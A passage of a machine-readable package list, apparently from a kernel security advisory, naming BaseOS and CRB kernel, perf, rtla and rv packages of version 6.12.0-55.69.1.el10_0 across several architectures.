"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
